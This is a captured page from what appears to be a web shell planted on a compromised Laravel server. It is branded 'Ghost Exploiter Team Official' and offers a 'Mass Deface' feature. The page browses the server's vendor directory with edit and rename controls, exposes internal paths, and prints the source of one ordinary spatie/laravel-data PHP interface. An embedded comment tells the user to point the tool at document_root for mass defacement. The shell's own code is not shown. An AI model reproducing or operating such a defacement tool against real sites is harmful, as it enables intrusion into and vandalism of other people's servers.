Ghost Exploiter Team Official
Mass Deface
Directory >>
/
var
/
www
/
html
/
back
/
vendor
/
spatie
/
laravel-data
/
src
/
Contracts
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
type
file
dir
+File/Dir
AppendableData.php
0.216KB
edt
ren
BaseData.php
3.24KB
edt
ren
BaseDataCollectable.php
0.123KB
edt
ren
ContextableData.php
0.185KB
edt
ren
DeprecatedData.php
1.392KB
edt
ren
EmptyData.php
0.165KB
edt
ren
IncludeableData.php
0.63KB
edt
ren
PropertyMorphableData.php
0.143KB
edt
ren
ResponsableData.php
0.545KB
edt
ren
TransformableData.php
0.819KB
edt
ren
ValidateableData.php
0.421KB
edt
ren
WrappableData.php
0.234KB
edt
ren
<?php namespace Spatie\LaravelData\Contracts; use Illuminate\Contracts\Support\Responsable; interface ResponsableData extends Responsable { /** * @param \Illuminate\Http\Request $request * * @return \Symfony\Component\HttpFoundation\Response */ public function toResponse($request); public static function allowedRequestIncludes(): ?array; public static function allowedRequestExcludes(): ?array; public static function allowedRequestOnly(): ?array; public static function allowedRequestExcept(): ?array; }
<=Back
Liking